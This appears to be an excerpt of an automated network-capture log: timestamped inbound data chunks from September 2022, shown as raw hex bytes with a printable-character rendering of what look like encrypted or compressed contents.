                                                                                                                                                2022-09-29 12:51:48 UTC27161INData Raw: 25 d9 d2 03 1a f9 38 bb b4 d5 06 1e 04 1e 41 0c 9b ff 25 a1 e0 2e 36 85 58 40 ce 75 6b 86 42 23 e8 0d dc f6 24 c6 78 95 71 94 cc a8 65 73 88 8a 44 23 96 a2 1a 94 14 c5 b7 31 c4 33 92 24 3f 69 26 d5 5c 39 62 7c e6 96 d8 be 12 a9 68 8a e7 30 1d 69 f9 7a d8 68 51 c1 0f be 89 6f d2 08 6d c0 58 0f ea e2 09 46 e1 a0 e0 85 cb d1 15 3e 18 a4 56 57 95 3a 50 64 95 fa b4 9d c8 25 74 72 b5 56 f6 87 6b dc 82 0a be a6 61 e8 ec bf a9 21 9b 97 42 94 f5 eb 51 2e 7b e5 7c 5b f9 86 e8 3a 71 6d 46 30 1f 07 c0 a1 0a 60 08 2e db 4b 8d f6 80 92 ca ac 11 6d 11 64 11 e5 35 48 de 84 ec ab 28 63 76 a8 3f d4 4f fa 33 c9 95 82 ad da 49 6f a3 6b ef c9 11 79 5d 09 94 89 76 8d 88 e7 c6 f1 8f 9a e8 dc af 20 29 e6 57 0f d3 5f 33 f4 91 94 4c c7 c3 27 c6 b5 8b 19 40 cf b6 57 3a d9 61 1c 3d
                                                                                                                                                Data Ascii: %8A%.6X@ukB#$xqesD#13$?i&\9b|h0izhQomXF>VW:Pd%trVka!BQ.{|[:qmF0`.Kmd5H(cv?O3Ioky]v )W_3L'@W:a=
                                                                                                                                                2022-09-29 12:51:48 UTC27177INData Raw: 72 4d 8b ab ed c7 77 0d 25 0c f2 26 4a d5 b7 09 1b f2 58 35 00 19 54 59 8b 9d 97 e4 07 8e c3 10 38 f5 a8 c1 3a dd 3d ae 7a e3 ee 16 f6 d2 14 8c 72 4b 87 f8 f7 e0 11 b2 70 94 2f 0d 93 88 b9 e7 70 55 d3 47 d2 19 09 1f 6c 62 52 b4 85 22 27 5b 33 66 2d 1a 5d 8c e0 87 ee 9a 55 84 20 ed af 36 e2 61 5d 1f 7e 04 fa e1 d2 47 d8 01 0e 95 2a 1f bb b9 26 83 92 db 06 48 d4 a0 c4 4c 12 0d 6b c5 7b 1b 4e 6d 90 29 44 d4 56 67 be 84 a5 1f 39 b1 6e 5a 93 06 61 7f 3d f5 e7 e7 1a f1 1d a0 e0 29 81 2d 19 3e 9a d7 ad 25 17 c5 91 b1 dd f1 7a 4f 95 de 7b 42 c1 64 ad 5f c6 21 b1 3b 2d d4 ba 6b 21 3a 33 aa 24 fc 8d 76 ff ac e4 47 d5 a0 0d 4c 8b a3 45 02 8a f2 be 5c dc e3 7e 7b 5c fa 65 ab 6e a8 08 28 61 c7 9a 07 02 04 18 fb 7a f3 19 0d e5 ac b5 a6 99 c3 d5 d6 9d 64 c2 b5 09 8c 83
                                                                                                                                                Data Ascii: rMw%&JX5TY8:=zrKp/pUGlbR"'[3f-]U 6a]~G*&HLk{Nm)DVg9nZa=)->%zO{Bd_!;-k!:3$vGLE\~{\en(azd
                                                                                                                                                2022-09-29 12:51:48 UTC27193INData Raw: d4 37 5d 88 5f 06 60 0d b7 16 05 bf 70 8f e9 f6 89 45 5f 68 0b f7 bb 9b 4d b2 b5 27 2e 84 39 a7 5e 59 27 b9 5b 7c c8 8b 61 b3 3c c4 2a c4 0d 9a f9 c4 04 68 a2 d2 df 69 51 84 0a 8d 34 c3 0a 9f 98 bd b2 d4 75 ab 69 16 18 83 a2 f2 fd 0d 53 0b 31 8e 9b 41 a8 30 49 ba 29 07 5c af 58 29 83 37 07 ba 6f 52 81 00 33 e5 27 ff 43 cf 36 c3 8a c2 84 52 19 e6 5b 01 91 a4 7f ae e0 17 20 86 ad 08 16 8c d0 ca 9c 6b 69 5b ab a4 59 f3 f3 48 4c a1 57 19 e7 cd 2d 16 57 35 8a 21 00 9c b9 58 63 5c f5 74 c5 37 c8 a5 04 3f f0 e9 bb d0 9b a7 a3 c6 16 f8 38 00 99 0a 7a cf c6 b0 8a d6 39 71 b2 bd b2 ed e1 88 0b c1 0b 2e 2d 4f 1c 30 52 e8 cd e6 41 72 1b a6 4f df d0 83 05 fd 9b ee a0 f7 56 83 86 51 96 8f 04 16 ad ac 49 c5 5f 5d 86 36 f3 38 3a e0 b6 3c 88 56 11 2d 52 e4 02 5a 13 25 7c
                                                                                                                                                Data Ascii: 7]_`pE_hM'.9^Y'[|a<*hiQ4uiS1A0I)\X)7oR3'C6R[ ki[YHLW-W5!Xc\t7?8z9q.-O0RArOVQI_]68:<V-RZ%|
                                                                                                                                                2022-09-29 12:51:48 UTC27209INData Raw: 45 b7 87 e2 05 12 2e 47 4c e1 88 90 94 94 e1 45 64 c3 21 e6 cc 69 09 fb e6 31 11 46 5b 7c 3a e4 8c ff a3 fa c7 3b 6a 56 ef 92 fc 64 01 e5 81 c7 80 06 06 0d 01 53 f1 25 45 e7 66 b5 dc ad 17 9b 8d a6 1b 37 57 7b 79 65 aa 59 b9 41 8c f1 45 47 46 8e 9e 29 a1 35 ad 21 e1 cd bd e0 aa 7d ef 0d df 37 2d 4d ab 2f 08 68 c6 0f f4 d6 73 98 d6 d8 f9 87 11 78 26 26 f2 31 8c e3 b1 bc b8 ba c3 6d 12 2a d8 9b 2c 69 38 8f 91 65 90 58 00 22 47 0e 3f 31 13 0a 97 77 cc 63 f5 60 32 6a f9 47 fa c8 88 d0 41 25 db 80 4b 61 0e a9 c8 07 b2 55 b5 d7 fd 0b 46 be 17 0e bc 6f 9e 7c f5 17 7b d5 d4 9f be 66 64 dd eb c2 c9 62 19 66 ab 2d b5 5e 18 84 11 24 ff ab f2 90 06 bd f7 c9 2b 47 cd 3e b1 77 d4 6d 20 9a 6a e5 32 ff 49 17 8d b1 d7 43 39 b3 a6 82 ea 07 7f 87 69 27 00 8c 12 63 82 c3 1c
                                                                                                                                                Data Ascii: E.GLEd!i1F[|:;jVdS%Ef7W{yeYAEGF)5!}7-M/hsx&&1m*,i8eX"G?1wc`2jGA%KaUFo|{fdbf-^$+G>wm j2IC9i'c
                                                                                                                                                2022-09-29 12:51:48 UTC27225INData Raw: f0 1d d0 dd ba c9 31 d1 66 dc ee e4 2e 86 bb b2 00 ea e8 68 ef eb 5e 29 8a 71 08 21 6e e5 ff 9b 07 d8 af 51 4c 89 de 35 be d1 a3 5c 76 62 6f 8c 6d 76 59 2b 1d 3b dc fb c2 38 85 ed c6 57 0f ac b0 1d 39 5f 20 70 87 f5 17 eb da 92 97 73 bc ba 0a e4 9f ac 22 34 dd 64 e1 9c 56 62 b2 d3 3d 0a 4e cc 67 46 31 dc 0d 14 3c 4a a2 6e ad 51 8b 59 c1 4f 7c 65 64 51 56 24 af 56 9a ab 29 25 d2 51 ac a3 e8 e9 9c 5f bd 68 df de 92 39 43 aa 3a 66 b0 30 a9 4e 51 03 a8 14 3c 2b 3a 3d a5 df 5a 65 e9 32 9f 63 81 f6 97 c5 1b 65 ba 8b 4e bf e8 b3 6d 24 ca 5d c1 c1 01 d7 09 84 d8 91 d4 c1 5a 30 bd e1 26 fa aa 72 64 a5 cb 6b ba b2 84 85 dc 7c 90 d7 5a df b6 5d b3 6b 07 90 9d 80 29 0b 4f 41 d1 34 a8 9e 84 bf 53 f9 26 9b 3a 8d 85 13 47 f3 aa 84 f2 1e 71 bd 7c 07 74 e2 d4 32 92 ca 0b
                                                                                                                                                Data Ascii: 1f.h^)q!nQL5\vbomvY+;8W9_ ps"4dVb=NgF1<JnQYO|edQV$V)%Q_h9C:f0NQ<+:=Ze2ceNm$]Z0&rdk|Z]k)OA4S&:Gq|t2
                                                                                                                                                2022-09-29 12:51:48 UTC27241INData Raw: 79 d1 a5 13 54 2a 78 16 9a 9f 83 49 86 c3 c2 bc a3 5c 63 4e ec 2f c7 82 30 c7 5e 14 a4 3b 04 32 07 eb 97 a4 52 67 4d f5 e8 5c 8c 2a b7 65 37 d4 5e 86 ab da b8 9b b2 2c 28 e1 16 4e 06 03 c4 08 91 cf 1c 0f 44 ea 92 0f 67 50 2f c3 5c f1 b0 59 d0 c0 93 8f 26 19 59 b0 e7 a4 0c b2 dd c2 48 dc 70 53 f1 5c 69 5c 79 2e 4a d0 f9 3f 1f f5 1c bb dd 7e f6 24 30 af 7d 7b c1 de 48 8c a1 3f 83 f5 e0 91 d9 fc a9 ea 75 1d 2e dd 05 95 68 a5 bf 3b 83 bf 08 37 ef 87 2d d2 f8 f6 d2 c2 8d 2c ea a9 78 bf a5 eb 91 ce c7 b1 6e 72 34 52 be 4f ef 0e c6 20 54 10 50 31 67 bb ab 3a 3e 44 d6 59 e6 c8 c7 65 4e 74 56 1d 87 ac 0c b2 4f db ca 93 8a 0f ec 7e 12 2e 3e 22 d1 5d c4 73 0e 40 fc 0c 45 41 9a 5b e1 1c 50 71 2b ee 89 eb d6 33 36 9c 89 bd 4f f6 85 e4 f2 ef b0 b5 46 04 6f e8 f9 fa 9e
                                                                                                                                                Data Ascii: yT*xI\cN/0^;2RgM\*e7^,(NDgP/\Y&YHpS\i\y.J?~$0}{H?u.h;7-,xnr4RO TP1g:>DYeNtVO~.>"]s@EA[Pq+36OFo
                                                                                                                                                2022-09-29 12:51:48 UTC27257INData Raw: c9 b6 cb 61 b1 da 99 3f b3 55 f0 58 dd e2 86 bf 69 df 25 47 b9 58 0a d6 ca e8 4d 2d 74 70 8a d2 fb 80 70 61 bf 5e 92 18 50 0a f5 31 72 17 07 a8 8f d2 f8 5b 6f a1 45 5c 6e 67 a0 e8 a4 9e ea d0 fb 20 66 9f 12 72 2b 99 04 55 51 56 0d 1a ce 32 a1 f9 04 c0 12 94 95 97 ef f3 fd 96 71 9b c0 27 da 12 82 99 e0 69 e0 34 cc 07 54 e7 52 85 3d 09 70 2a 21 28 64 61 02 6a cb f3 18 9b 88 9e c2 5d 8a 71 23 7f 5c 8b 6f 18 db 7c 23 01 a4 cb d5 50 16 0d a2 0c c0 b6 bd 05 91 aa fb 7d 62 76 3d a6 93 a4 3e e6 bb 0c 07 ba 27 4a e3 38 d8 9f 52 cc 5e ae d1 13 fb 8b de 54 ca 87 9f 7f bc 73 47 dd a1 df 8f 62 a0 63 4c 01 fa 3c 6a 9e 00 49 b9 f9 29 66 ae 46 e9 c0 ef f2 86 0b c9 b1 67 b2 6c ed cb 02 4a 7e 43 ad 5f 1f c0 d7 5a 40 cf 1d 6e 51 fd cc b9 82 97 46 ef 98 05 f7 24 04 3d 66 22
                                                                                                                                                Data Ascii: a?UXi%GXM-tppa^P1r[oE\ng fr+UQV2q'i4TR=p*!(daj]q#\o|#P}bv=>'J8R^TsGbcL<jI)fFglJ~C_Z@nQF$=f"
                                                                                                                                                2022-09-29 12:51:48 UTC27273INData Raw: 17 ec 3a 3e e5 bb 09 01 5f 5b 22 81 48 a2 8a 69 f2 1a 6c 09 92 cb ff 4c 55 dc 53 ba 9a a1 3c a3 04 47 ea 98 15 5d a6 5c 22 34 04 8c 21 2b b7 46 50 5d a8 3c cf 86 ec 2c 17 e3 44 b6 0c 1d cd a7 8e cd cf 42 d0 0c 5e 68 45 12 73 c2 f4 98 38 e3 d6 c4 76 9c ff 83 81 98 a0 f7 cb f0 d9 bc 0b 0e 83 01 f7 d1 57 da 96 ee 91 d8 c3 19 1d 16 d8 4a 58 de 58 67 8a 65 a6 af 59 90 85 c3 1a 9a 41 67 ae 4e b9 ef e2 8b 57 fe 2b 69 7e e5 0b 2e c5 a5 07 3e 95 23 ac fe 01 73 9b 14 16 39 ee 82 94 b7 a2 1b 61 44 79 f9 e7 62 1c c4 f2 2d 3b 6f 48 3d 62 ac f1 02 b0 11 91 d9 14 94 0b e0 21 41 ff 91 a5 83 80 e4 45 7e ad 4c 4c 15 00 a1 3a 6e 9f f8 ce c1 9b 4c 01 32 ed bc 39 bc 7f 7f 53 a3 a6 51 69 22 3a 03 d5 76 39 60 c6 10 74 69 33 81 31 c2 65 ef a4 c6 5d 86 53 26 eb 67 2b 2e 65 0d 66
                                                                                                                                                Data Ascii: :>_["HilLUS<G]\"4!+FP]<,DB^hEs8vWJXXgeYAgNW+i~.>#s9aDyb-;oH=b!AE~LL:nL29SQi":v9`ti31e]S&g+.ef
                                                                                                                                                2022-09-29 12:51:48 UTC27289INData Raw: 87 34 5e c4 b4 bf ea 93 18 d3 87 da 1d cc be 76 ec 8d 5d 1a 85 c2 63 a0 fc 99 e6 a4 f7 4e 60 38 73 dd 0a 2b 78 1b 09 d4 1a d6 5f 4c 55 cb 54 a6 44 22 31 c8 69 76 f4 02 ac a2 25 85 4e da 33 3d ab 6f 6f 19 15 8a 9b 9a ae 93 37 03 05 fc 2e 72 c4 33 54 04 20 f5 3f d5 9d 2f d4 96 f4 fa 72 fb 8e e0 91 8b ae 50 40 5c a0 1c dd 32 ea 6b 9d 1e fd bb de a9 2f 49 ea 15 13 43 24 bb 75 02 57 91 23 c2 df f7 79 ff 89 18 26 39 bd 56 9f 66 96 b9 86 27 76 10 96 fb 26 41 de 85 a5 c4 89 3c b8 c3 9a 44 eb 5c 3a 5e 3c 29 f2 c4 41 7f 1a f1 0f 73 6b 6f cb 76 15 bc dc e6 8c 08 6f 53 53 12 55 ed c4 0f 7a d0 48 79 5f 8b 17 c5 79 ea cd 35 05 2c cf 88 74 18 55 2b 39 87 0e 36 c2 61 d5 4b b6 8d cb c5 6b e0 08 64 ed 97 0b d4 b7 c9 20 e5 82 d7 29 d4 1f e0 a8 6c 1a 9c 99 5c b8 76 a6 fb 3c
                                                                                                                                                Data Ascii: 4^v]cN`8s+x_LUTD"1iv%N3=oo7.r3T ?/rP@\2k/IC$uW#y&9Vf'v&A<D\:^<)AskovoSSUzHy_y5,tU+96aKkd )l\v<
                                                                                                                                                2022-09-29 12:51:48 UTC27305INData Raw: f7 ee 81 e3 75 fc 4d 93 c8 b4 d6 a8 a1 30 aa 7d 70 8a 68 a7 58 5e 40 8e 88 08 7c 00 54 bb 04 61 54 bf 66 39 d2 f2 a7 61 02 29 03 cc 3a a1 33 0e 72 85 39 37 18 ac 2e 6c fe e4 39 77 f2 db 58 11 9b a3 9d 72 5d 67 cc 41 1c cc 5e bd 41 62 b0 cc dc dc 7c d2 d6 87 22 d9 05 e9 f6 a8 27 05 8b c9 59 e9 4a 9d fc 99 79 c5 96 7d 4d 08 d1 a8 9a 28 f5 d1 47 06 56 d4 2c d0 e2 f8 a3 4a b5 1d 0d ba de a4 b7 51 b7 a7 59 a7 42 b8 fe 76 1c 73 a4 33 02 86 59 05 a2 80 fd c2 17 5d e0 8d 4c 06 f0 1e 09 6c 9d 94 44 fa 1d 7a 43 62 f3 ca 91 be 33 b3 3f fe f9 e1 b2 72 9e b5 d6 78 8a 29 b9 29 c4 2e 63 29 ac f9 13 98 21 bf e9 7a 85 ac 67 b4 5a 49 7f 7d f5 69 52 33 9d 9b ed 42 20 d9 a5 81 7a 8a a3 d8 40 92 35 c5 b5 c0 d5 e1 be 48 bf 57 af 4f a9 1d 6a a5 c2 de aa 6e 6c 6c 73 c0 75 92 6a
                                                                                                                                                Data Ascii: uM0}phX^@|TaTf9a):3r97.l9wXr]gA^Ab|"'YJy}M(GV,JQYBvs3Y]LlDzCb3?rx)).c)!zgZI}iR3B z@5HWOjnllsuj
                                                                                                                                                2022-09-29 12:51:48 UTC27321INData Raw: 71 ef 93 5d 89 2f 28 0e c5 36 d2 bf f1 5f 2b ed 20 90 29 88 6c dd 15 f0 36 61 8f c7 6a 95 20 c5 98 16 70 88 7e 45 24 52 d0 9c 34 87 18 d6 d3 2b 4a 4e c5 02 09 be cb 8c 56 7f 94 07 6a d3 5f 0a 58 cd ea 8a d4 58 a9 7d 79 14 0f 26 1d ba 74 58 e7 bd fa 7e f6 cf b7 cc 20 4e e5 8c 20 11 40 bd 44 b9 e4 59 74 21 20 1f 22 a1 ac f5 6d b9 1c d1 30 ed 6d e5 a3 73 81 a3 93 e4 e4 4c 98 c5 3f 24 64 b3 e3 0e 1e ff a5 dd d0 2f 64 0f d8 d0 75 49 33 45 4e a1 aa ab 9e af 81 47 7d e7 ac b2 83 6b a6 6b 86 9e c4 bb 1d 0b 22 60 26 ed c7 c3 7a ce 4a 6d 39 a8 98 85 88 95 fc eb dd 5c 4d bf c2 0f 92 65 ec b5 c1 f9 0a 5d ee ac c3 c4 48 5e 57 46 0e 79 b3 fc e5 f7 23 53 16 64 fa 69 c0 77 53 8d d5 d7 ce d6 dd e8 24 99 f2 e1 67 90 20 06 5f b5 1e 28 45 e3 6e f6 9d 93 81 b4 5c b7 cf 30 66
                                                                                                                                                Data Ascii: q]/(6_+ )l6aj p~E$R4+JNVj_XX}y&tX~ N @DYt! "m0msL?$d/duI3ENG}kk"`&zJm9\Me]H^WFy#SdiwS$g _(En\0f
                                                                                                                                                2022-09-29 12:51:48 UTC27337INData Raw: 9d 6d 08 7c 7f 8c 4c 08 32 a3 20 a6 fe c9 c3 5a 79 48 85 e2 56 ed 9d a2 9b fb c6 bc da c4 ac 82 2f 91 39 54 fc 1e 66 23 ba 8f db a5 0c 15 54 5a 70 84 2d ae 3c 68 70 95 c5 64 2b 94 05 f3 70 7b 36 d6 3a c1 83 e7 7c eb ae 9c cc f6 fd ba ce 69 2b 1a 68 a9 62 b0 24 7b 3b 09 32 53 5c 95 4b 23 93 03 be f3 e5 ee 0a be f2 4c be 26 69 95 bf d5 28 5b be e6 ce 9c d9 7f fa c1 3b 85 81 35 21 5c a1 cc 89 57 cf 24 e0 94 95 10 ea ba 79 37 16 d9 d6 c4 c7 a2 81 9d 6f e0 b4 51 a4 5f 35 f3 f2 ec 53 66 84 8e 59 e0 b4 2e 11 3e b7 9c 2f c2 22 dd 7e c3 58 71 22 1c 5d a9 f1 61 8d e2 5e 54 b0 6e 84 49 fa f0 51 11 f6 9f 03 f2 29 a6 7f 7d f2 d2 bf 00 f4 e7 70 42 0f 7c de 11 85 cf 83 67 c0 a9 41 77 2c d2 d1 e1 4d c8 a1 d2 f5 74 f4 7c 9b e9 10 1c a5 3a 28 70 e8 15 3f e4 fa 1a ce 3d 8e
                                                                                                                                                Data Ascii: m|L2 ZyHV/9Tf#TZp-<hpd+p{6:|i+hb${;2S\K#L&i([;5!\W$y7oQ_5SfY.>/"~Xq"]a^TnIQ)}pB|gAw,Mt|:(p?=
                                                                                                                                                2022-09-29 12:51:48 UTC27346INData Raw: a4 11 27 3f 7e 18 9d 27 ab ad 1b a3 99 e3 9a e1 40 3b a4 59 7f bd fa 45 ec 7f 8d 85 7d c6 18 5f 60 7c 9b eb 38 4a d2 eb 75 69 14 85 c1 b3 d6 f4 69 db 36 59 6b d0 f6 00 c0 47 91 7b ff 7f f6 86 56 14 ba b8 87 cd 00 b0 0d 32 b0 54 4c 05 12 ec 7f 6b 37 10 fe d3 e3 0e a2 f0 ba 5b 2f 34 a7 b6 a4 34 1d db ec e1 b2 2c 34 a9 d7 b4 24 cf 38 0f f9 fc 6d fd 57 6d 2d 0f 83 ce 61 64 5f f3 48 6b b7 39 03 d2 64 30 59 65 d1 9d 47 15 24 57 fe 2d 3f 62 46 52 ed 7b 94 21 7d 76 c4 c2 98 27 08 b5 8b f4 27 40 eb d0 eb 7a f4 66 8d 33 dc 91 d3 af 83 04 0e da 85 6e 48 93 78 bf 67 43 1f 3c f3 86 1b 1d db 56 e4 43 be 92 ca 6b b3 fc e6 96 af a7 ca 17 6a 6e e2 a9 4f f7 0b ad bc 12 9f 38 05 ca 73 12 d7 da 21 66 78 b4 c3 1e df 67 9f 88 c2 da 38 2c 6a eb e3 d1 13 cc 80 6b ec ef 18 9a 18
                                                                                                                                                Data Ascii: '?~'@;YE}_`|8Juii6YkG{V2TLk7[/44,4$8mWm-ad_Hk9d0YeG$W-?bFR{!}v''@zf3nHxgC<VCkjnO8s!fxg8,jk
                                                                                                                                                2022-09-29 12:51:48 UTC27362INData Raw: a6 7b 7e 66 de 41 ac 36 5e 53 9d 20 73 21 83 d6 86 7c bb 9e 86 2f c5 a5 5c 32 4b a6 0c c1 72 36 a2 cd f4 a8 b2 e8 57 0c bf 5f 4d a2 96 81 d1 cc d8 00 d2 ab d0 94 6e 83 5f 16 3c 03 4f f7 67 b7 3b e5 be 2f 9d a7 87 be 2a cc 29 54 66 3b c4 69 e0 09 05 b8 f0 d2 85 7f 88 25 6a 0e f8 ac 79 20 75 94 4e 00 9c f4 5c 1b ff 59 40 de 13 9d c1 c5 73 b0 9f 7b 5a a3 3f c2 31 ff 7b 64 b6 9f de e9 7c 3b 7e ef 02 d9 fc f1 56 4d 83 ae 63 32 8b f2 c4 5d 95 12 9f 38 31 90 0e 9c 37 29 a0 e8 c7 3b 87 e5 d7 5b c3 f9 4d b7 59 b4 64 6e c6 74 8f 3d 07 de 53 48 d7 f2 14 d9 7b b6 64 68 2c 5c cc 15 90 f5 d1 bc c9 50 48 1f f5 9c b7 8c 92 f3 7e ae 17 67 91 a0 cc 29 1a a7 c4 ed 3c 27 9d 36 97 d1 23 d1 e3 d4 39 b8 cc f9 1e bb 97 f2 14 ae 89 32 66 aa 5d 5c 4b a0 f6 f0 e0 c3 1b 64 fb c6 cc
                                                                                                                                                Data Ascii: {~fA6^S s!|/\2Kr6W_Mn_<Og;/*)Tf;i%jy uN\Y@s{Z?1{d|;~VMc2]817);[MYdnt=SH{dh,\PH~g)<'6#92f]\Kd
                                                                                                                                                2022-09-29 12:51:48 UTC27378INData Raw: 3b 7c 85 cc 35 4a bc 11 88 ad 69 b7 0f 49 dd 7d ce 71 71 a3 8c 0a c9 0e 04 27 69 3e 16 db b6 2a e1 75 b9 3b 1d ec 66 9f b7 4d ba 95 fa c5 e3 f3 cf 46 fd 60 ca 2f e1 7c c9 70 50 86 05 cf 2c af c0 69 2f 72 5d 14 8b 93 df a4 05 e7 87 44 72 aa 6c bb 81 5f 87 40 a8 d5 8d 49 67 2a c9 5c 92 73 49 91 06 e6 96 32 d2 10 05 41 b0 84 2c 57 b3 27 5b e0 90 e9 b7 49 d4 76 1d 19 f1 08 78 ca 55 13 c9 7c 1c ca 6f 68 a7 7c 68 16 4d c9 8b 94 73 6a 32 2d 37 35 74 4d 70 f8 5f a4 38 67 eb b7 78 d8 1f 73 42 ad 7c 6c 9c f7 85 16 83 5d c0 1d d0 01 f8 3f 9e e9 15 b3 1e a6 11 5d 27 d3 6b c6 ab 80 b6 7e fc af 7f 10 f1 88 22 4f bd 96 28 05 b8 49 54 d5 d0 30 0e 9b 87 c5 f3 13 8e d1 29 60 fd 14 af c1 1c 47 da 1c 2b f4 db a1 4c 12 0f 00 b7 0e 6c ac 54 6f 7d 47 b7 d6 9e 40 cc 75 0e 09 d3
                                                                                                                                                Data Ascii: ;|5JiI}qq'i>*u;fMF`/|pP,i/r]Drl_@Ig*\sI2A,W'[IvxU|oh|hMsj2-75tMp_8gxsB|l]?]'k~"O(IT0)`G+LlTo}G@u
                                                                                                                                                2022-09-29 12:51:48 UTC27394INData Raw: 6b e9 43 45 a2 3e 86 22 f5 bc 6b 6a 9d 07 f7 28 77 a0 0e e0 be db 06 18 36 f3 6e 49 c5 03 a8 c1 a2 5d f7 8a 23 1f d0 55 01 8a 40 95 86 65 1a 6e 26 28 4f 1d fd 9b 84 27 87 4b c5 d8 cd 0d dc dc 88 7d ff b5 5a a6 e0 0f 62 8e 58 4f 7a 92 60 d1 c3 f8 e5 fd 0c 78 dc 18 5c 2d 60 58 f7 c8 2e 9d 5c 7b bc 62 24 e3 6f 8c 53 29 ce ca 9f 3e ff 3d 72 c4 a5 32 54 f3 93 fe 1c b0 06 a7 87 74 75 23 71 f1 9d e8 c4 7a d5 21 aa 42 20 82 0b 6e 89 44 32 18 49 3d 3e 6c d7 96 ec 3c 0f 0d c2 50 f4 dc 28 07 d8 c8 1c 5d 47 f2 f2 5f 66 e2 fc db 0c 25 1e 88 56 96 64 1c f6 50 27 cc 4f 8b 41 59 69 f6 33 53 79 cf 15 fd d7 4b 98 35 4d 03 a2 3a 46 f2 9a 84 f0 53 5d c4 1e 6c db 95 90 5f 05 09 ae d9 ee 29 50 bb 6b d6 5f 4d 59 87 d5 88 91 f1 02 76 08 49 6f 75 4d 5c 31 72 73 b2 3e 3a 08 b3 a2
                                                                                                                                                Data Ascii: kCE>"kj(w6nI]#U@en&(O'K}ZbXOz`x\-`X.\{b$oS)>=r2Ttu#qz!B nD2I=>l<P(]G_f%VdP'OAYi3SyK5M:FS]l_)Pk_MYvIouM\1rs>:
                                                                                                                                                2022-09-29 12:51:48 UTC27410INData Raw: 4f 0c ba 4f c6 61 ec 84 eb ac 58 3a e2 4a c3 5d 56 3f b9 ed 97 95 62 e0 97 be ee d6 85 5a 24 bf 1a 44 61 b2 24 20 cc aa 7c 70 e4 e6 96 fa 2d 55 19 99 1c 5b c4 92 6b fb 2c ea c1 68 78 84 00 11 61 48 ae 3b 36 cc 5b b4 35 56 c7 a5 63 49 77 22 e0 e5 ad 2f 56 4f 48 f8 ba e4 9a a8 98 1f ce 86 10 50 51 f1 82 64 53 49 c3 7d ba 4d c3 d7 23 2e de 65 7e 56 5d 55 1d db 72 4b 52 c6 93 e9 f0 4e 29 00 e3 9d c3 ff 8a 61 b5 83 59 00 b3 6c b6 64 9a c8 86 0f 3d fb 57 65 0d d5 fe 5b cd fd 79 80 3c cc d8 cb f8 4b c9 93 95 43 4a f3 a4 69 ad 03 89 0c af 53 47 c1 9f 5a 8a 68 df 93 20 2b d7 42 62 bc ee 93 da 67 ab 8a 1c 88 93 de 59 af 6e c9 ac 68 b3 00 98 c8 11 0e 14 f4 18 d7 ec 18 85 17 fe 30 7a 75 15 86 ed 95 75 b1 74 13 11 43 c3 b6 c3 82 49 46 aa 60 19 95 7f 77 62 e7 8e 66 9c
                                                                                                                                                Data Ascii: OOaX:J]V?bZ$Da$ |p-U[k,hxaH;6[5VcIw"/VOHPQdSI}M#.e~V]UrKRN)aYld=We[y<KCJiSGZh +BbgYnh0zuutCIF`wbf
                                                                                                                                                2022-09-29 12:51:48 UTC27426INData Raw: cb 23 64 ac f6 d5 c7 43 25 e2 ea e7 80 24 3a 62 98 e0 1b b5 a2 9f 32 12 d9 44 7d cc 3d e2 66 bd e6 f1 90 b9 8e 35 90 ad 18 be 9d 26 e2 f0 43 82 e5 46 7f 50 fc d2 c1 36 3f 96 0f 17 c2 91 2b 22 46 76 e0 4c 8e 57 b0 8f 0b f6 5f 26 50 71 d4 68 d8 d9 9b 00 14 3d d3 5f 6d 1c c7 ec 75 f3 71 20 9a 71 89 79 4a fc 62 54 58 ae ad 0b b2 65 c3 e9 43 00 5d 6f 31 39 3c 13 75 70 6d 15 b3 45 19 7f 4f 95 dd 82 fb ec bc 5a 7b eb 21 3a 32 09 88 4f e2 78 36 a5 f3 8a e3 77 aa b9 39 90 06 f7 a3 77 ac 78 13 91 47 4e 00 27 a1 09 c3 b7 d8 51 8a 30 a0 5c 0e 6d 3e 73 84 01 3d ef ec f7 50 75 d5 23 8c 27 db 89 df ef af 57 e5 72 b5 0f 34 93 e6 24 c8 36 84 5a 13 10 d5 fe 7a 7e 0d 41 e9 cb 65 18 a0 58 e5 8e ea fa fd 6a 0f 45 73 72 cf cf 15 12 6b d3 3e 76 66 af 13 96 89 05 01 aa f3 a5 e4
                                                                                                                                                Data Ascii: #dC%$:b2D}=f5&CFP6?+"FvLW_&Pqh=_muq qyJbTXeC]o19<upmEOZ{!:2Ox6w9wxGN'Q0\m>s=Pu#'Wr4$6Zz~AeXjEsrk>vf
                                                                                                                                                2022-09-29 12:51:48 UTC27442INData Raw: 17 b7 d7 d5 e0 90 de ad 1e c8 15 ef 03 6e 21 62 0e c0 7e 6b d3 11 f1 75 77 ea 39 09 74 f4 e4 42 d1 75 d0 b1 69 cf 37 5c 17 4d 71 a8 d8 3a 72 d1 20 b2 fe 92 e9 25 c8 61 05 b0 ba d3 5d d9 a3 4d c3 07 c9 ff bd 5d b2 18 98 5a 26 e0 7a fe 10 93 26 20 96 af 85 6e b9 ea ba 7e 29 4d be 4f 18 34 af a2 80 39 3f 90 f3 db 76 1a 43 d1 d4 30 71 64 25 9a fe 2c 9c 45 b3 c5 71 b1 17 08 66 a1 54 db 19 e4 19 4b f9 38 6f 63 3a 62 c9 1c ab 64 8d 37 80 b7 68 ac 6d 80 a2 05 b4 88 70 c0 12 19 cd b5 d4 01 ee c6 5d da 31 1c 09 6f c6 52 e9 ba 11 85 ce 21 2d 7d 12 4a b8 07 56 ff ae 85 23 8d e2 f6 5d 5f ad 48 65 e1 19 5f d1 1c 03 68 8a 01 d7 a0 52 61 6b 5a ec d2 fd 95 57 d5 ad 01 a7 b7 4c da 3a cc aa 9a fe 0b 93 2c a3 23 21 83 a0 34 9c ab 82 44 11 a2 0d a4 6a 38 98 5c 4d a3 0a 4f d5
                                                                                                                                                Data Ascii: n!b~kuw9tBui7\Mq:r %a]M]Z&z& n~)MO49?vC0qd%,EqfTK8oc:bd7hmp]1oR!-}JV#]_He_hRakZWL:,#!4Dj8\MO
